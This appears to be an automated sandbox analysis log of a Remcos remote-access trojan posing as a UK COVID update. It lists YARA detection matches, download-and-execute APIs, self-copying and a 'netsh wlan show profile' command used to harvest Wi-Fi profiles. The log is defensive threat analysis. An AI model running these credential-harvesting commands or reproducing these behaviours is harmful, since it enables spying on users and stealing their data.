Source: 28.2.UK COVID UPDATES AND ENTITLEMENT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.raw.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.2f737f0.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.unpack, type: UNPACKEDPE Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.3efd5c8.5.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 28.0.UK COVID UPDATES AND ENTITLEMENT.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000001C.00000000.430910958.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0000001C.00000000.430910958.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 0000001C.00000000.430910958.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000000.00000002.418169362.0000000002F23000.00000004.00000001.sdmp, type: MEMORY Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 0000001C.00000000.429209935.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0000001C.00000000.429209935.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 0000001C.00000000.429209935.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000000.00000002.418954944.0000000003ED9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 00000000.00000002.419012391.0000000003F25000.00000004.00000001.sdmp, type: MEMORY Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 0000001C.00000002.467780819.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
Source: 0000001C.00000002.467780819.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Source: 0000001C.00000002.467780819.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000000.00000002.418279701.0000000002F5D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Remcos hash1 = 7d5efb7e8b8947e5fe1fa12843a2faa0ebdfd7137582e5925a0b9c6a9350b0a5, author = JPCERT/CC Incident Response Group, description = detect Remcos in memory, rule_usage = memory scan
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040A71E ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,FindCloseChangeNotification,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,URLDownloadToFileA,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,ShellExecuteA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@ 28_2_0040A71E
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: String function: 0040FC1A appears 54 times
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: String function: 0040FCBA appears 34 times
Sample file is different than original file name gathered from version info
Source: UK COVID UPDATES AND ENTITLEMENT.exe Binary or memory string: OriginalFilename vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421491993.0000000008040000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameEefpkmt.dll0 vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.416785382.00000000011DB000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000000.227770784.0000000000A32000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUK CRYPTED.exe, vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.418954944.0000000003ED9000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameEcpxyswgubfautk.dll" vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe Binary or memory string: OriginalFilename vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000016.00000000.406987972.0000000000182000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUK CRYPTED.exe, vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe Binary or memory string: OriginalFilename vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000017.00000000.408268140.0000000000222000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUK CRYPTED.exe, vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe Binary or memory string: OriginalFilename vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000018.00000000.409445105.00000000000A2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUK CRYPTED.exe, vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe Binary or memory string: OriginalFilename vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000019.00000000.410713658.0000000000232000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUK CRYPTED.exe, vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001A.00000002.413557314.0000000000222000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUK CRYPTED.exe, vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe Binary or memory string: OriginalFilename vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001B.00000002.414728789.00000000000E2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUK CRYPTED.exe, vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe Binary or memory string: OriginalFilename vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000003.464412455.0000000002D27000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemspass.exe8 vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000000.429240159.0000000000652000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUK CRYPTED.exe, vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000003.424932368.0000000002FAF000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameVNXT.exe* vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 0000001C.00000003.424932368.0000000002FAF000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamee.exe4 vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe Binary or memory string: OriginalFilenameUK CRYPTED.exe, vs UK COVID UPDATES AND ENTITLEMENT.exe
Source: UK COVID UPDATES AND ENTITLEMENT.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: UK COVID UPDATES AND ENTITLEMENT.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: UK COVID UPDATES AND ENTITLEMENT.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\UK COVID UPDATES AND ENTITLEMENT.exe.log Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@24/14@101/5
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_00408150 FindResourceA,LoadResource,LockResource,SizeofResource, 28_2_00408150
Source: UK COVID UPDATES AND ENTITLEMENT.exe Virustotal: Detection: 26%
Source: UK COVID UPDATES AND ENTITLEMENT.exe ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe File read: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe 'C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe'
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.google.com , www.youtube.com , www.google.com , www.youtube.com ,www.google.com , www.youtube.com
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\dwnl.exe 'C:\Users\user\AppData\Local\Temp\dwnl.exe'
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 920
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Test-Connection www.google.com , www.youtube.com , www.google.com , www.youtube.com ,www.google.com , www.youtube.com Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Process created: C:\Users\user\AppData\Local\Temp\dwnl.exe 'C:\Users\user\AppData\Local\Temp\dwnl.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040CA41 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 28_2_0040CA41
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe File created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_004081B7 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,Process32NextW,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 28_2_004081B7
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6648:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5252:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6720
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Mutant created: \Sessions\1\BaseNamedObjects\remcos_aqizussesx
Source: UK COVID UPDATES AND ENTITLEMENT.exe, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs Cryptographic APIs: 'CreateDecryptor'
Source: UK COVID UPDATES AND ENTITLEMENT.exe, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs Cryptographic APIs: 'CreateDecryptor'
Source: UK COVID UPDATES AND ENTITLEMENT.exe, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs Cryptographic APIs: 'CreateDecryptor'
Source: UK COVID UPDATES AND ENTITLEMENT.exe.0.dr, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs Cryptographic APIs: 'CreateDecryptor'
Source: UK COVID UPDATES AND ENTITLEMENT.exe.0.dr, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs Cryptographic APIs: 'CreateDecryptor'
